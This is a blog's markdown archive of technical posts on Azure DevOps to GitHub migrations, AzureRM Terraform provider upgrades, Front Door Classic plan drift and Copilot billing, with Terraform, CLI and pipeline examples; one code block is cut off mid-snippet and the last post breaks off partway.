# Elliott Leighton-Woodruff | L-W Tech > Enterprise Architect, specializing in Azure, Infrastructure as Code and AI services. This file contains the full Markdown of every published post. Prefer the canonical URL when citing a post. # Enterprise Live Migrations Just Killed Your Best Excuse to Stay on Azure Repos - URL: https://blog.l-w.tech/blog/2026-09-09-Enterprise-Live-Migrations-Just-Killed-Your-Best-Excuse-to-Stay-on-Azure-Repos - Date: 2026-09-09 - Author: Elliott Leighton-Woodruff - Tags: Azure DevOps, GitHub, Migration, DevOps, CI/CD Enterprise Live Migrations hit public preview on 31 August. Cutover is typically under 30 minutes, but only if you're on GitHub Enterprise Cloud with data residency. Here's what moves, what doesn't, and the CLI for the first repo. I've sat in enough migration planning meetings to know the exact moment a GitHub move dies. Someone asks "how long is the freeze?" and the honest answer is "we're not sure, could be a weekend, could be longer if the import fails partway through." Meeting adjourned. Revisit next quarter. Repeat forever. Plenty of teams still want Copilot, agent workflows and the rest of the GitHub side of the house. They also don't want to own a multi-day outage on a repo that ships production code every day. That freeze window is why so many estates are still on Azure Repos years after Microsoft started pushing GitHub. Enterprise Live Migrations (ELM) went to public preview on 31 August. It is aimed at that freeze, not at "migrate the whole ADO project in one go". ## Why the freeze always killed the move The existing route into GitHub is a snapshot import. You pick a cutover window, lock the repo, run the import and hope nothing critical lands while it's running. A handful of quiet repos? That's an afternoon. Hundreds of actively developed repos across teams shipping daily? That's a coordination exercise nobody signs up for twice. Staying put still costs you. **Every quarter you delay is a quarter without Copilot code review, GitHub agent workflows and whatever else ships on GitHub first.** ELM does not make a GitHub move risk-free. It does kill the open-ended outage as the reason you keep kicking it. ## What ELM actually does ELM is three stages: **validate**, **synchronise**, **cut over**. Validate checks the source repo is migration-ready before anything moves. Synchronise copies the data, then keeps applying changes in the background with incremental sync and delta tracking while your team carries on in Azure Repos. Cut over is the only step with real downtime: a final sync, then the switch to GitHub. Microsoft's number is typically under 30 minutes for most repositories. That last step is the pitch. Run the sync for as long as you like, watch it settle, then book a cutover measured in minutes rather than a weekend. You can click through it in the Azure DevOps portal, or script it with the `azure-devops` CLI extension if this needs to be a repeatable process rather than a one-off. ## The catch: data residency only Read past the announcement headline. **ELM currently only supports GitHub Enterprise Cloud with data residency.** Standard GEC is out. The tell is the URL. Target org on `ghe.com`? You're in. Standard `github.com` enterprise org? Not yet. A lot of enterprises signed GEC deals before data residency existed as a SKU. If you assumed "public preview" meant your tenant, check the hostname before you book a workshop. ## Running your first migration The CLI maps onto those three stages. One repo looks like this: ```bash # Kick off a migration for one repository az devops migrations create \ --org https://dev.azure.com/lwtech \ --repository-id \ --target-repository https://lwtech.ghe.com/lwtech-platform/core-api \ --github-token # Check where it's up to az devops migrations status \ --org https://dev.azure.com/lwtech \ --repository-id # Schedule the cutover once you're happy with the sync state az devops migrations cutover set \ --org https://dev.azure.com/lwtech \ --repository-id \ --cutover-date 2026-09-20T22:00:00Z ``` There's also `pause`, `resume`, `abandon` and `list` if you're running this across a portfolio. Worth wiring `list --include-all` into a dashboard so platform teams can see status across the org instead of chasing individual repo owners. ## What doesn't come with you ELM moves repositories, commit history, branches, tags, pull request metadata and comments. It converts branch policies into GitHub rulesets. That's the source control layer done properly, including the review history cheaper import scripts usually drop. It does **not** migrate work items, pipeline definitions, releases, wikis, test artefacts or Azure Artifacts. If "the ADO project" in your head is Boards and Pipelines as much as the repo, ELM only solves the Git bit. | | Pros | Cons | |---|---|---| | **ELM (this release)** | Near-zero freeze window, continuous sync, hybrid model keeps Boards and Pipelines running against the new repo | GEC with data residency only, doesn't touch work items or pipeline definitions | | **Traditional snapshot import** | Works against standard GEC, well documented, no data residency requirement | Snapshot-based, needs a genuine freeze, higher risk of last-minute drift | ## The hybrid model is the useful bit ELM will move the source code to GitHub and leave Azure Boards and Azure Pipelines where they are. It can rewire pipelines at the new repo, and it clones them during migration so you can prove builds against GitHub before you commit to cutover. "Migrate everything at once" was never realistic for teams with years of sprint history in Boards, or YAML nobody wants to hand-translate to GitHub Actions in the same sprint. Source control now. Planning tooling later, if at all. Treat those as separate decisions. ## One thing worth watching ELM tooling is also showing up in the Azure DevOps Remote MCP Server, still in preview. I've written before about the Entra authentication gap that currently blocks third-party MCP clients like Claude Desktop and Claude Code from using that server at all. If you were hoping to drive migrations from an MCP agent rather than the CLI, you inherit that same limit for now. Don't build a process around it until that gap closes. ## Where this leaves you On GitHub Enterprise Cloud with data residency, and the freeze was the thing stopping you? That excuse is gone. Run a validate pass against your busiest repo this week and look at the sync before you put anyone's calendar against a cutover date. On standard GEC? ELM is not your unlock yet. Watch the roadmap rather than waiting on this preview. Either way, split the source control move from Boards and Pipelines. You don't need to solve all three in one programme, and pretending you do is the same big bang thinking that kept these migrations in "next quarter" for years. Has anyone run a repo through ELM in anger yet? I want to hear how the sync held up under real commit volume, not a demo repo. --- # AzureRM 5.2 Is Another Sign That Platform Engineering Has Won - URL: https://blog.l-w.tech/blog/2026-08-21-AzureRM-5-2-Platform-Engineering-Has-Won - Date: 2026-08-21 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, Azure DevOps, Platform Engineering, Infrastructure as Code, Managed Identity, CI/CD, DevOps AzureRM 5.2 is not the story. Managed identities, Terraform and Managed DevOps Pools are. Here's how Azure platform teams are moving from Infrastructure as Code to Platform as Code. I've lost count of the AzureRM release notes I've skimmed for "what can I use on Monday". New resources. Bug fixes. The odd behaviour change that will ruin someone's Friday `plan`. AzureRM 5.2 will get the same skim, and fair enough. I still think most people are reading the wrong bit. The changelog is not the interesting part. Microsoft keeps taking jobs platform teams used to own, wrapping them in a managed service and leaving you with policy instead of patch nights. In the estates I build, Terraform is still the control plane. Secrets lose to federation. Self-hosted agent fleets lose to Managed DevOps Pools. Put those next to each other and it stops looking like three product updates. It looks like a move from **Infrastructure as Code** to **Platform as Code**. ## Infrastructure as Code stopped being optional I still meet teams whose runbooks are click-paths with screenshots. Ten years ago that was normal. Now it's the thing you apologise for in an audit. Terraform won a lot of Azure estates for a boring reason. You stopped describing the platform in Confluence and started defining it. ```hcl resource "azurerm_resource_group" "platform" { name = "rg-platform-prod" location = "UK South" } resource "azurerm_storage_account" "state" { name = "stplatformprod001" resource_group_name = azurerm_resource_group.platform.name location = azurerm_resource_group.platform.location account_tier = "Standard" account_replication_type = "LRS" } ``` Raise a ticket for a resource group? Attach a PDF of the portal clicks? That's the old world. Code, review, apply. IaC got us out of manual provisioning. It did not fix identity. ## Identity was the bit that stayed stuck in 2019 I've seen clean Terraform modules and tidy Azure DevOps YAML still authenticate like this: Terraform → service principal → client secret → variable group → hope nobody lets it expire on a bank holiday The estate looked modern. The trust model did not. If you've owned a platform long enough, you already know how this fails. Secret dies at 2am. Rotation gets skipped because "the pipeline still works". Security finds a five-year-old credential in a library variable. Somebody leaves and the only SPN password is in their exported CSV. IaC fixed resource creation. It left passwords sitting in the delivery path. Microsoft's direction has been blunt for a while: stop storing those secrets when you don't have to. ## Terraform with Workload Identity Federation For Azure DevOps-led teams, [Workload Identity Federation](https://learn.microsoft.com/azure/devops/pipelines/release/configure-workload-identity) is one of the few identity migrations I will actively push. Azure DevOps hands Entra a short-lived token. You don't keep a client secret in the variable group. Nothing to rotate every 90 days because someone set a calendar reminder in 2022 and then left. A shape I use looks like this. ### User-assigned managed identity ```hcl resource "azurerm_user_assigned_identity" "terraform" { name = "terraform-platform-mi" location = azurerm_resource_group.platform.location resource_group_name = azurerm_resource_group.platform.name } ``` ### Federated credential ```hcl resource "azurerm_federated_identity_credential" "ado" { name = "azure-devops-federation" resource_group_name = azurerm_resource_group.platform.name parent_id = azurerm_user_assigned_identity.terraform.id issuer = "https://vstoken.dev.azure.com/your-org-id" audience = ["api://AzureADTokenExchange"] subject = "sc://organisation/project/terraform" } ``` Swap `issuer` and `subject` for your real org, project and service connection. The values above are placeholders. Don't paste them into prod and wonder why federation fails. ### RBAC ```hcl resource "azurerm_role_assignment" "contributor" { scope = data.azurerm_subscription.current.id role_definition_name = "Contributor" principal_id = azurerm_user_assigned_identity.terraform.principal_id } ``` I almost never leave this at subscription-wide Contributor outside a lab. Start at the platform RG or a management group slice (whatever the pipeline actually touches) and open scope when something fails for the right reason. Later in the post I'll show the 5.2-shaped version with an ABAC condition, which is where I want production deploy identities to land. Once the service connection is federated, the pipeline authenticates without a stored password. **You're managing trust boundaries and RBAC now**, not a spreadsheet of client secrets. Wire the AzureRM provider to that identity in CI. Keep `ARM_CLIENT_SECRET` out of the variable group: ```hcl terraform { required_providers { azurerm = { source = "hashicorp/azurerm" version = "~> 5.2" } } } provider "azurerm" { features {} use_cli = false # Pipeline sets ARM_CLIENT_ID, ARM_TENANT_ID, ARM_SUBSCRIPTION_ID # and ARM_USE_OIDC=true for the federated service connection } ``` ```yaml # AzureCLI@2 / TerraformTask with an AzureRM service connection # configured for Workload identity federation (manual) env: ARM_USE_OIDC: true ARM_CLIENT_ID: $(servicePrincipalId) ARM_TENANT_ID: $(tenantId) ARM_SUBSCRIPTION_ID: $(subscriptionId) ``` If a pipeline still needs `ARM_CLIENT_SECRET`, give that debt an owner and a date. "We'll get to federation later" is how later becomes never. ## Managed DevOps Pools hit the same nerve as agents always have Self-hosted agents existed for sensible reasons. Private network paths. Controlled egress. Custom tools. Images that match what production expects. They also quietly became a second estate. Patch Tuesdays. Agent version drift. Pool capacity theatre at 9am when half the company queues a deploy. Golden images that stay golden until the second team installs a random CLI "just for this pipeline". I've lost more hours than I care to admit keeping runners healthy so other people could run Terraform. Say that out loud and the loop sounds as silly as it is. [Managed DevOps Pools](https://learn.microsoft.com/azure/devops/managed-devops-pools/overview) hand the VM babysitting back to Microsoft. You still decide who can use the pool, what it can reach and which image baseline is acceptable. You stop living inside the scale set. You can also define the pool in Terraform with [`azurerm_managed_devops_pool`](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/managed_devops_pool). If the pool only exists because someone clicked through the portal in 2024, it will drift the first time three teams "improve" it. ```hcl resource "azurerm_dev_center" "platform" { name = "dc-platform-prod" resource_group_name = azurerm_resource_group.platform.name location = azurerm_resource_group.platform.location } resource "azurerm_dev_center_project" "platform" { name = "platform-agents" dev_center_id = azurerm_dev_center.platform.id resource_group_name = azurerm_resource_group.platform.name location = azurerm_resource_group.platform.location } resource "azurerm_managed_devops_pool" "terraform" { name = "mdp-terraform-prod" resource_group_name = azurerm_resource_group.platform.name location = azurerm_resource_group.platform.location dev_center_project_id = azurerm_dev_center_project.platform.id maximum_concurrency = 4 azure_devops_organization { organization { url = "https://dev.azure.com/your-org" parallelism = 4 # Optional: limit which projects see the pool # projects = ["Platform"] } # 5.1 added CreatorOnly; useful when the apply identity # should not become a standing pool admin permission { kind = "CreatorOnly" } } identity { type = "UserAssigned" identity_ids = [azurerm_user_assigned_identity.terraform.id] } stateless_agent {} virtual_machine_scale_set_fabric { sku_name = "Standard_D2ads_v5" # Pin the image. "latest" is fine until an image break ruins your Friday. image { well_known_image_name = "ubuntu-24.04/latest" } # Put agents on a subnet you control when you need private endpoints # subnet_id = azurerm_subnet.agents.id } } ``` Point the pipeline at the pool: ```yaml pool: name: mdp-terraform-prod steps: - checkout: self - task: TerraformInstaller@1 inputs: terraformVersion: "1.11.4" - bash: | terraform init -input=false terraform plan -input=false -out=tfplan env: ARM_USE_OIDC: true ARM_CLIENT_ID: $(servicePrincipalId) ARM_TENANT_ID: $(tenantId) ARM_SUBSCRIPTION_ID: $(subscriptionId) ``` ### Practical MDP checks before you migrate a fleet Read the [features timeline](https://learn.microsoft.com/azure/devops/managed-devops-pools/features-timeline) like an ops checklist, not a brochure. Register `Microsoft.DevOpsInfrastructure` in every subscription that will host a pool. Miss that and you get a confusing create failure instead of a pool. Move off Generation 1 Azure Pipelines images. Gen2 shipped April 2026 and Gen1 is not getting updates. If your pool still points at the old aliases, put the cutover on a calendar. Pin image versions for production Terraform pipelines. Since January 2026 you can pin in the pool UI or use a versioned `well_known_image_name` (for example `ubuntu-24.04/20250427.1.0`). When an image breaks a pipeline, use an [`ImageVersionOverride`](https://learn.microsoft.com/azure/devops/managed-devops-pools/demands#imageversionoverride) demand and roll back without redesigning the pool. Send pool logs to Log Analytics (available since January 2026). If you can't answer "why did agent allocation stall at 09:05?", you don't have a platform yet. You have hope and a status page. Sort outbound access before default outbound access finishes dying. [Public static IP support](https://learn.microsoft.com/azure/devops/managed-devops-pools/features-timeline) exists partly because of that retirement. Isolated pools get a static IP path and that has a NAT cost. Design it on purpose, not as a surprise invoice. Put corporate roots on the agent from Key Vault during provisioning. Stop copying the same "install root CA" task into every YAML file. Watch the August 2026 roadmap items if self-hosted is still winning design reviews on thin arguments. Instance Mix (up to five VM sizes per pool), manual agent purge and custom startup scripts close a lot of the remaining gaps. Spot VMs and container agents are listed for later in 2026. I'm not claiming every regulated network path is ready for MDP tomorrow. I am saying "we've always had self-hosted" is a weak reason to keep patching scale sets in 2026. ## What a boring, modern Terraform path looks like now The setups I trust most look roughly like this: Terraform repo → Azure DevOps pipeline → workload identity → Managed DevOps Pool → Azure The interesting part is what dropped out of that path. SPN passwords leave the variable groups. The private agent fleet whose only job is running `terraform apply` can shrink. The portal stops being a second control plane for "just this one exception". Security reviews get shorter when long-lived credentials stop being normal. Support load drops when fewer moving parts are yours. Developers stop needing "Jim's agent pool" tribal knowledge. If you're still rotating SPN secrets and babysitting agents because that's how the platform was born, fix the trust path and the runner path before you refactor another module. ## So where does AzureRM 5.2 fit? Read the [5.2.0 release notes](https://github.com/hashicorp/terraform-provider-azurerm/releases/tag/v5.2.0). The title alone will not tell you what to do on Monday. [AzureRM 5.2.0](https://github.com/hashicorp/terraform-provider-azurerm/releases/tag/v5.2.0) shipped 20 August 2026. A few items are worth acting on. There is a new list resource for `azurerm_user_assigned_identity`. Handy when you want Terraform to inventory identities that already exist, not only the ones this root module created. `azurerm_mongo_cluster` no longer requires `administrator_password` when `create_mode` is `Default`. That unblocks Entra ID-only auth. Another password you don't have to store. The change I care about most for platform work is on `azurerm_role_assignment`. You can now update `condition`, `condition_version` and `description` in place. If you use conditional RBAC on deploy identities, pin to 5.2 before you edit those fields. Here is the sort of assignment I want on a Terraform identity once federation is in place. Contributor on the platform resource group, with a condition that blocks the identity from minting more role assignments: ```hcl resource "azurerm_role_assignment" "platform" { scope = azurerm_resource_group.platform.id role_definition_name = "Contributor" principal_id = azurerm_user_assigned_identity.terraform.principal_id condition_version = "2.0" condition = < 5.2` in that repo (or at least 5.1 if you need `CreatorOnly` on MDP first). Run `terraform plan` in non-prod and fix upgrade diffs before production. 3. Tighten the deploy identity. Start from resource group or management group scope, not subscription Owner. Add an ABAC condition like the example above. 5.2 lets you iterate `condition` without rebuilding the assignment. 4. Stand up one `azurerm_managed_devops_pool` on a Gen2 Ubuntu 24.04 image, with Log Analytics enabled and the image version pinned. Run a non-critical plan/apply pipeline there for a week. 5. Check outbound path and corporate CAs on that pool before you migrate anything that talks to private package feeds or MITM proxies. 6. Keep Terraform as the source of truth. "Emergencies only" portal clicks become the permanent second control plane if you let them. What are you going to stop operating yourselves next: secrets, agents, or something else that's quietly become a platform team side hustle? --- # Actually validating deployments with TF's new AzureRM 5.0 - URL: https://blog.l-w.tech/blog/2026-07-30-TF-Preflight-Validation-in-AzureRM-5 - Date: 2026-07-30 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, IaC, DevOps, CI/CD AzureRM provider 5.0 adds opt-in preflight validation that calls Azure during plan. It's useful, but it's not magic. Here's where it helps, where it skips resources, and what will bite during the upgrade. I'll be honest. I'm tired of clean Terraform plans that still blow up during `apply`. You know the sort. The pipeline gets through plan, the change gets approved, everyone assumes the risky bit is behind them, then Azure rejects the deployment 20 minutes later because of quota, policy, SKU availability or some ARM-side validation Terraform couldn't see locally. That's the gap AzureRM 5.0 is trying to close with preflight validation. It's not a replacement for `apply`. It's not full Azure validation for your whole estate. It's a live Azure check during `terraform plan` for a small set of supported resources. And yes, I'd still turn it on in the right pipelines. ## Why pre-apply validation matters Terraform's plan/apply split is still one of the best things about the workflow. You get reviewable changes, approvals, drift visibility and a clean record of what should happen. The problem is that a Terraform plan isn't Azure's final answer. Azure policy, subscription quota, regional SKU constraints, Resource Provider registration and ARM-specific naming rules all live on the Azure side of the fence. Before 5.0, plenty of those problems only turned up during `apply`, which is exactly when you want fewer surprises. AzureRM 5.0 adds an opt-in Preflight Validation API call during `terraform plan`. For supported resources, the provider sends the planned payload to Azure before you run `apply` and asks, "Would this pass validation?" That's useful. **Catching an App Service Environment or Service Plan failure at plan time is much better than discovering it halfway through a change window.** ## How preflight validation works Preflight validation sits inside the `enhanced_validation` block. In AzureRM 5.0, that block belongs inside `features`. ```hcl provider "azurerm" { features { enhanced_validation { preflight_enabled = true preflight_location_fallback = "eastus2" } } } ``` You can also enable it with an environment variable: ```bash export ARM_PROVIDER_ENHANCED_VALIDATION_PREFLIGHT_ENABLED=true ``` That's usually how I'd wire it into CI. Local developer plans stay fast and familiar, while the controlled pipeline does the Azure-backed validation with the right service principal and permissions. When it's enabled, AzureRM calls the Preflight Validation API during `terraform plan` for supported resources. Azure can then return failures for policy, quota or invalid property values before the run gets anywhere near `apply`. ## What is supported today This is the part to read twice. At launch, preflight validation only covers these resources: - `azurerm_app_service_environment_v3` - `azurerm_service_plan` - `azurerm_dashboard_grafana` - `azurerm_eventgrid_namespace` - `azurerm_managed_redis` - `azurerm_nginx_deployment` Everything else is skipped. That skip behaviour matters. If your module creates a storage account, a virtual network, a Key Vault and a Service Plan, preflight is only helping with the Service Plan in that list. It doesn't warn you that the other resources were outside coverage. I'd document this in your platform repo. Otherwise someone will look at a passing plan in six months and assume "preflight passed" means "Azure validated everything". It doesn't. ## Pros, cons and use case ### Pros - It catches some policy, quota and property validation errors during `terraform plan`. - It's opt-in, so you can introduce it deliberately. - It works alongside location and Resource Provider validation in the same `enhanced_validation` block. - It's useful for CI pipelines where `plan` is the approval gate. ### Cons - It needs live Azure credentials at plan time. - It only covers a small set of resources. - It can't validate values that are still `(known after apply)`. - It can make local and CI plans behave differently if they use different identities or permissions. ### Use case If your team deploys App Service Environments, Service Plans, Managed Redis, Grafana, Event Grid namespaces or NGINX deployments into policy-heavy subscriptions, I'd enable this in CI. That's the sweet spot: regulated subscriptions, quota pressure, approval gates and resources where a mid-apply failure is genuinely painful. If your estate doesn't use the supported resource types yet, turn it on if you want the setting standardised, but don't pretend it changes much. ## Implementation steps 1. Pin AzureRM to `5.0.0` first. Don't do this as a casual `terraform init -upgrade` on a Friday afternoon. 2. Move `enhanced_validation` into the `features` block if your provider config still has it elsewhere. 3. Enable preflight validation. 4. Set `preflight_location_fallback` to a region that makes sense for your estate. 5. Decide whether this belongs in code or CI. My preference is CI via environment variable unless every developer environment has the same Azure permissions. 6. Check that the service principal used for plan has the Azure permissions needed for preflight calls. 7. Run `terraform plan` in a sandbox against one supported resource. 8. Deliberately trip a policy or quota issue and confirm the pipeline surfaces the failure where your team will see it. 9. Roll it into your normal pipeline, but keep your apply-time handling and rollback process. A clean preflight isn't a guarantee. ## Pitfalls and mitigations ### Assuming full coverage Preflight doesn't cover most AzureRM resources today. Mitigation: list the modules and resource types where preflight helps. Be explicit. If only your App Service module benefits, say that in the module README. ### Breaking local developer plans A local plan that used to work offline may now need Azure access for supported resources. Mitigation: enable preflight in CI with `ARM_PROVIDER_ENHANCED_VALIDATION_PREFLIGHT_ENABLED` instead of hardcoding it in the provider block. That keeps the stronger validation in the controlled path without surprising every developer laptop. ### Missing computed values Preflight can't validate values Terraform doesn't know yet. If a risky value comes from another resource created in the same apply, AzureRM can't send that value in the preflight request. Mitigation: keep apply-time validation and don't sell preflight internally as a complete safety net. It's an earlier warning for known payloads. ### Treating plan as production truth This one is more cultural than technical. A preflighted plan is better than a normal plan, but it's still not the same thing as a successful deployment. Mitigation: keep change windows, approval gates and rollback paths based on the fact that `apply` can still fail. ------ ## AzureRM 5.0 upgrade gotchas Preflight is the headline feature, but AzureRM 5.0 is a proper major version. The breaking changes list isn't cosmetic. Here are the ones I'd check first. ### Resource Provider registration has changed `resource_provider_registrations` now defaults to `none` instead of `legacy`. `skip_provider_registration` has gone. If your subscription relied on the provider quietly registering a long list of Resource Providers during init, your first apply after the upgrade can fail with RP-not-registered errors. You have two realistic options: - List the Resource Providers you want with `resource_providers_to_register`. - Set `resource_provider_registrations = "legacy"` temporarily while you clean up the platform properly. I'd prefer the first option. Hidden provider registration always felt a bit too magical for locked-down subscriptions. ### Enhanced validation moved and defaults changed `enhanced_validation` now lives inside `features`. Location validation and Resource Provider validation are disabled by default. If you used those checks before, you need to turn them back on explicitly. ```hcl provider "azurerm" { features { enhanced_validation { locations = true resource_providers = true preflight_enabled = true } } } ``` If you liked catching typo'd regions during plan, don't miss this. ### The old enhanced validation environment variable is gone `ARM_PROVIDER_ENHANCED_VALIDATION` no longer does the job. It's been split into: ```bash ARM_PROVIDER_ENHANCED_VALIDATION_LOCATIONS ARM_PROVIDER_ENHANCED_VALIDATION_RESOURCE_PROVIDERS ARM_PROVIDER_ENHANCED_VALIDATION_PREFLIGHT_ENABLED ``` Check your pipeline variables. An old variable silently doing nothing is exactly the sort of thing that produces a very boring incident review. ### Legacy resources have been removed A long list of deprecated resources is now gone. The big ones I'd search for first: - `azurerm_app_service` - `azurerm_app_service_plan` - `azurerm_function_app` - App Service and Function App slot variants - `azurerm_static_site` - `azurerm_redis_enterprise_cluster` - `azurerm_redis_enterprise_database` - HPC Cache resources - PostgreSQL single-server resources - Several Orbital and Batch resources If those names are still in your modules, this upgrade isn't a version bump. It's a refactor. ### Storage account configuration has moved out The deprecated `queue_properties` and `static_website` blocks on `azurerm_storage_account` have been removed. Use the dedicated resources instead: - `azurerm_storage_account_queue_properties` - `azurerm_storage_account_static_website` If you have inline queue or static website config inside storage account modules, expect a real plan change. ### Storage resource arguments are moving to IDs Several storage resources are retiring `storage_account_name` in favour of `storage_account_id`. Check resources such as: - `azurerm_storage_container` - `azurerm_storage_queue` - `azurerm_storage_share` - `azurerm_storage_share_directory` This is mostly mechanical, but it can touch a lot of module interfaces if you passed names around everywhere. ### Boolean names have finally changed The old `enable_x` style arguments have been removed in favour of `x_enabled`. One example is `azurerm_api_management`, where settings like `protocols.enable_http2` and several TLS toggles have moved to the newer naming. If your modules still use the deprecated names, 5.0 is where the warnings turn into failures. ### ID validation is stricter Some Event Grid, Data Factory and CDN Front Door resources now validate resource IDs and static ID segments case-sensitively. That can expose messy string building that Terraform previously tolerated. If your modules build IDs manually, check the casing. ### Storage account public access defaults changed `allow_nested_items_to_be_public` on `azurerm_storage_account` now defaults to `false`. That's a behaviour change, not just a schema tidy-up. If you relied on the old default, your next plan may try to change public access on existing storage accounts. Read that part of the plan carefully before you apply it. ## My recommendation Don't treat AzureRM 5.0 like a routine provider upgrade. Pin the version. Run plans across every environment from a branch. Search your modules for removed resources and deprecated storage account blocks before you touch production. For preflight validation, I'd enable it in CI where you use the supported resource types, especially in policy-heavy subscriptions. It gives you earlier failures for a class of problems that used to waste time during `apply`. Just be honest about the boundary. Preflight is useful. It's narrow. A passing preflight check doesn't mean Azure has validated your whole deployment. Has anyone already run the 5.0 upgrade across a large landing zone estate? I'd be interested to know what caused more pain in practice: Resource Provider registration, storage account changes or the removed legacy resources. --- # The Front Door Terraform Quirk That's Really Just Classic Telling You to Migrate - URL: https://blog.l-w.tech/blog/2026-07-23-Terraform-Front-Door-Phantom-Diffs - Date: 2026-07-23 - Author: Elliott Leighton-Woodruff - Tags: Terraform, Azure, IaC, Azure Front Door, Platform Engineering Your Front Door Terraform plan isn't broken, it's Classic showing its age. Here's why the drift happens, and why the real fix isn't a workaround. If you've run `terraform plan` against an `azurerm_frontdoor` resource and watched it propose renaming half your backend pools, health probes and routing rules for no reason you can identify, you're not losing your mind. I've seen this exact pattern in client environments, and it always triggers the same reaction: check the state file, check the config, check git history, find nothing, panic slightly, then move on and hope it doesn't happen again. It happens again. There's a root cause, and it's not really a Terraform bug at all. You're running a SKU that's already on its way out, and the underlying API has stopped getting the care it used to. **Not every diff in your plan represents real infrastructure drift**, and this resource is the clearest example I've hit of what happens when a legacy platform surface starts to rot quietly underneath your IaC. ## What the API is actually doing `azurerm_frontdoor` manages the classic tier of Azure Front Door: backend pools, health probes, load balancing settings, frontend endpoints and routing rules, all nested inside one monolithic resource block. The problem is in how the underlying Front Door API returns data. When Terraform issues a `GET` against an existing Front Door instance to refresh state, the service can return the JSON for those sub-resources in a different order than they were originally sent. Terraform's diffing logic cares about order for these nested blocks, so a reordering that changes nothing operationally still reads as a config change worth actioning. HashiCorp's fix, introduced in provider version 2.58.0, was to persist an explicit ordering into state under a field called `explicit_resource_order`. The documentation is direct about the trade-off: > "If you run the apply command against an existing Front Door resource it will not apply the detected changes. Instead it will persist the explicit_resource_order mapping structure to the state file... this change in behaviour in Terraform is due to an issue where the underlying service team's API is now returning the response JSON out of order." The first `apply` after this fix landed doesn't do what your diff says it's going to do. It quietly rewrites the internal ordering map in state, resolves the mismatch, and only then does the resource resume functioning normally. If that surprised you the first time you saw it, that's because it's a pretty odd behaviour to document and ship. ## Why the API behaves like this in the first place `azurerm_frontdoor` manages Front Door Classic, which stopped accepting new resource creation on 1 April 2025. Support for managed TLS certificates on Classic profiles ended on 15 August 2025, forcing anyone still relying on those to bring their own cert or migrate. The full API is being switched off on 31 March 2027. That timeline matters here, because it explains the ordering quirk rather than just sitting alongside it. Classic is in maintenance mode, not active development. An API that's no longer being meaningfully invested in is exactly the kind of API that starts returning JSON in an inconsistent order and never gets a clean fix, because nobody on the service side is prioritising it anymore. The `explicit_resource_order` workaround isn't a permanent patch on a healthy API, it's a Terraform-side sticking plaster on a service that's already been told it's being retired. If you're starting from scratch, the decision has been made for you: new Front Door Classic profiles have been blocked at the platform level since 1 April 2025. You can't create them even if you wanted to. ## Why it keeps coming back In a lengthy GitHub thread on this, a user reported that every time they added or removed a routing rule, pool or health probe, Terraform proposed renaming existing resources alphabetically rather than just adding the new one. HashiCorp's response explained the root cause: > "The crux of the issue is that the service sends back the JSON out of order and that confuses Terraform, which is why I made the fix... to keep a local state list of the resources to help Terraform understand the correct ordering." `explicit_resource_order` is a local convenience Terraform builds to make sense of unordered API output, not a property Azure enforces server-side. Every time a new sub-resource is added or removed, or the API introduces a new field the state doesn't yet account for, that local ordering falls out of sync and the phantom diffs come back. One recurrence was traced to the API adding new required blocks (a default backend pool setting and a default frontend endpoint) that weren't in the original state mapping. The whole comparison broke again. HashiCorp aren't wrong to expose `explicit_resource_order`. It's the most sensible fix available when you don't control the upstream API's response ordering. But it does mean Terraform's state stops being a clean mirror of reality and becomes "state plus a workaround field," which is useful to understand before you spend an afternoon hunting a bug in your own config. ## How to tell if it's phantom or real, while you're still stuck on it Run `terraform plan` twice in a row. If the second plan is clean after an apply that only touched `explicit_resource_order`, you've hit this behaviour. That's the fastest check. Beyond that: real drift shows attribute value changes (a modified health probe path, a different backend address). Phantom reordering shows names and IDs shuffling between blocks with no underlying value change. They look very different once you know what to look for. `terraform plan -refresh=false` is your other tool here. It shows what Terraform proposes without re-reading current API state. Compare that against a normal refreshed plan. A gap between the two is a strong signal you're looking at an API ordering artefact rather than a change made outside Terraform. To be certain, check the state directly: ```bash terraform state show azurerm_frontdoor.example ``` Check what `explicit_resource_order` looks like before and after an apply. If only that field moved, nothing about your actual infrastructure did. Don't let anyone `apply` this on autopilot because "the plan looked scary but it's probably fine." That's how you end up with a production change you can't explain in a post-incident review. ## The actual fix isn't a workaround, it's migration All of the above is useful if you need to survive the next six, twelve or eighteen months on Front Door Classic. It's not a long-term strategy. The ordering quirk, the frozen feature set, the two deadlines already behind us and the one still ahead in March 2027 all point the same direction. `azurerm_cdn_frontdoor_*` resources (Front Door Standard/Premium) don't have this problem. The API behaves deterministically and your plans will actually reflect your changes. I know that sounds like a low bar, but after dealing with Classic it genuinely feels like a relief. Scope the migration now, while you still have time to do it properly, rather than scrambling against the 2027 cutoff. Have you hit this in your own Front Door deployments, or found a cleaner workaround than "apply once and re-check"? I'd genuinely like to hear how other teams have handled it. --- # GitHub Copilot Billing Just Changed. Don't Get Bitten. - URL: https://blog.l-w.tech/blog/2026-06-10-GitHub-Copilot-Billing-Just-Changed-Dont-Get-Bitten - Date: 2026-06-10 - Author: Elliott Leighton-Woodruff - Tags: GitHub Copilot, FinOps, DevOps, GitHub, Cost Management, Governance, AI GitHub Copilot moved to usage-based billing on 1 June 2026. For individuals it is mostly a measurement change. For enterprise IT, it is a FinOps problem you need to start solving now. GitHub Copilot moved to usage-based billing on 1 June 2026, swapping premium request units for GitHub AI Credits across every plan. Most people will read that as a billing admin change. I would push back on that framing. For individuals, yes, it is mainly a measurement shift. For enterprise IT, it is the moment Copilot stopped being a safe flat-rate line item and started behaving like every other metered cloud service you actually have to govern. That distinction matters because the governance conversation usually comes after the cost surprise. ## What changed on 1 June Before 1 June, Copilot billed premium features using premium request units, with costs shaped by model multipliers. From 1 June, usage is measured in AI Credits, based on token consumption across input, output and cached tokens, plus the model selected. GitHub pegs 1 AI Credit at $0.01 USD. That is clear enough. But clarity does not protect you from quiet accumulation, especially if nobody has set a budget or looked at usage patterns since rollout. Inline code completions remain included for paid plans. Chat and agentic workflows draw down the credit pool. | Area | Before 1 June 2026 | From 1 June 2026 | |---|---|---| | Billing unit | Premium request units | GitHub AI Credits | | Charging basis | Request count with model multipliers | Token consumption by model | | Cost conversion | Premium request pricing | 1 AI Credit = $0.01 USD | | Inline completions | Included | Still included for paid plans | | Heavier AI features | Request-based | Metered against AI Credits | ## Pricing models Subscription prices have not changed. Each plan now includes a monthly AI Credit allowance, and paid plans can exceed that allowance if overages are enabled. For organisations, the important bit is that included AI Credits are pooled at the billing entity level for Business and Enterprise. One team’s heavy usage draws from the same pot as a team that barely touches it. 